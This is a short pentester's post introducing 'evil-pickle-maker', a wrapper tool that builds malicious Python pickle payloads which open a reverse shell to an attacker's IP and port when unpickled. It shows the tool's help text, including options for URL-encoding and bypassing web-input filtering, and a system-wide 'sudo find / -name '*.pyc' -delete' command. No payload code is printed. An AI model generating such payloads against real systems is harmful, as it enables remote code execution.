During a pentest engagement addressing a Pickle vulnerability, I found a Gist for making rotten Pickles. I decided to turn it into a Tinyscript tool for later reuse in other engagements.

The transformation gives this new Gist.

$ evil-pickle-maker --help
EvilPickleMaker 
Author   : Alexandre D'Hondt (alexandre.dhondt@gmail.com)
Reference: https://gist.githubusercontent.com/BGrewell/ba619281070cc6185d81e32791a2289e/raw/fb63ce7aec76b2bf3313cae0333d1603d183550b/rotten_pickle.py

This tool is a Tinyscript wrapper for the aforementioned Gist.
This script creates a reverse shell that will be executed when the python pickle package attempts to unpickle it.
It can pickle any python code and execute it on the target when it is unpickled as long as the target has whatever
 modules you try to import. This code base64 encodes the python code so that it can be passed around as ASCII/Unicode
 text. It optionally URL encodes it so that it can be submitted through webforms ect.
 
Important note: With Python3, you could experience the following error: "ValueError: bad marshal data (unknown type code)"
		In this case, execute "sudo find / -name '*.pyc' -delete" to remove all pre-compiled Python files and retry.

usage: evil-pickle-maker [-a APPEND] [-l LINE_ENDINGS] [-u] [-h] [--help] [-v] ip port

positional arguments:
  ip    attacker's IP address
  port  attacker's port number

optional arguments:
  -a APPEND, --append APPEND
                        custom text (or instructions) to include (default: )
                         NB: this can be useful for bypassing filtering on web inputs
  -l LINE_ENDINGS, --line-endings LINE_ENDINGS
                        characters to use for line endings (default: \n)
                         NB: if these don't match the target you can get weird import errors
  -u, --url-encode      URL encode the resulting payload (default: False)

extra arguments:
  -h             show usage message and exit
  --help         show this help message and exit
  -v, --verbose  verbose mode (default: False)